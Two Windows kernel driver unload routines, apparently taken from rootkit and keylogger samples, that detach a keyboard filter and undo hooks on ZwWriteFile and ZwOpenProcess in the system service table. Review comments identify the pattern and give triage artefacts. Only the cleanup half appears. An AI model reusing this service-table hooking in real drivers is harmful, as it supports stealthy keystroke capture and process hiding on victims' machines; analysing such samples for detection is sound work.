Пример #1
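/*
 * Unload - DriverUnload routine; undoes the driver's setup step by step.
 *
 * Steps, as visible in this routine:
 *   1. detach from the lower device recorded in the device extension
 *      (pKeyboardDevice);
 *   2. put the saved ZwWriteFile entry back through UNHOOK_SYSCALL;
 *   3. unmap and free the MDL behind MappedSystemCallTable;
 *   4. wait until numPendingIrps has dropped to zero;
 *   5. delete the driver's device object.
 *
 * pDriverObject: driver object handed in by the I/O manager. Only the first
 *                device object (pDriverObject->DeviceObject) is handled.
 *
 * NOTE(review): a filter attached to a keyboard device combined with a
 * patched system-service-table entry is the shape of a kernel-mode
 * keylogger/rootkit sample. For triage, the visible artefacts are a
 * service-table entry that resolves outside the kernel image and an
 * unexpected filter device in the keyboard stack. On 64-bit Windows, Kernel
 * Patch Protection bugchecks when the service table is modified, and the
 * _asm blocks below are accepted only by the 32-bit MSVC compiler.
 */
VOID
Unload(
    IN PDRIVER_OBJECT pDriverObject
    )
{
    KTIMER            timer;    // paces the wait for outstanding IRPs
    LARGE_INTEGER     timeout;  // due time handed to KeSetTimer
    PDEVICE_EXTENSION pKeyboardDeviceExtension;

    DbgPrint("Begin DriverUnload routine.\n");

    // The device extension holds the pointer to the device we attached to.
    pKeyboardDeviceExtension = (PDEVICE_EXTENSION)pDriverObject->DeviceObject->DeviceExtension;

    // Leave the device stack first so no new requests are routed through us.
    IoDetachDevice(pKeyboardDeviceExtension->pKeyboardDevice);

    //***Begin HideProcessHookMDL SSDT hook code***

    // Restore the original service-table entry. cli/sti only masks interrupts
    // on the processor running this code; other processors can still read the
    // entry while it is swapped. Whether the swap itself is atomic depends on
    // UNHOOK_SYSCALL, which is defined outside this listing.
    // NOTE(review): nothing here waits for threads that may still be inside
    // NewZwWriteFile when the image is unloaded; confirm how the rest of the
    // driver handles that.
    _asm{cli}
    UNHOOK_SYSCALL(ZwWriteFile, OldZwWriteFile, NewZwWriteFile);
    _asm{sti}

    // Release the writable mapping of the service table.
    if (g_pmdlSystemCall)
    {
        MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
        IoFreeMdl(g_pmdlSystemCall);
        g_pmdlSystemCall = NULL;   // do not leave a pointer to the freed MDL behind
    }
    //*** End HideProcessHookMDL SSDT hook code***

    // KeSetTimer treats a non-negative due time as an ABSOLUTE system time.
    // A small positive value is already in the past, so the timer fired at
    // once and the loop below spun without sleeping. A negative value is
    // relative, in 100 ns units: -1000000 means 100 ms from now.
    timeout.QuadPart = -1000000;
    KeInitializeTimer(&timer);

    // Poll every 100 ms until every pending IRP has completed.
    while (numPendingIrps > 0)
    {
        KeSetTimer(&timer, timeout, NULL);
        KeWaitForSingleObject(&timer, Executive, KernelMode, FALSE, NULL);
    }

    // Nothing references the device any more; remove it.
    IoDeleteDevice(pDriverObject->DeviceObject);

    //TODO: clean up any remaining resources, close any files, etc..

    return;
} // Unload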
Пример #2
/*
 * OnUnload - DriverUnload routine for the ZwOpenProcess hook.
 *
 * Puts the saved ZwOpenProcess entry (ZwOpenProcessIni) back through
 * UNHOOK_SYSCALL, then unmaps and frees the MDL behind
 * MappedSystemCallTable if one was created.
 *
 * DriverObject: driver object handed in by the I/O manager; not used here.
 *
 * NOTE(review): unlike some variants of this routine, there is no interrupt
 * masking or other synchronisation around the table write; whether the swap
 * is atomic depends on UNHOOK_SYSCALL, which is defined outside this
 * listing. A service-table entry pointing outside the kernel image is the
 * artefact to look for when triaging a system that loaded such a driver.
 */
VOID
OnUnload(
    IN PDRIVER_OBJECT DriverObject
    )
{
    DbgPrint("Descargando driver...");

    // Remove the hook: restore the original service-table entry.
    UNHOOK_SYSCALL(ZwOpenProcess, ZwOpenProcessIni, NewZwOpenProcess);

    // No MDL was set up, so there is nothing left to release.
    if (!g_pmdlSystemCall)
    {
        return;
    }

    // Drop the mapping of the service table and free its MDL.
    MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
    IoFreeMdl(g_pmdlSystemCall);
}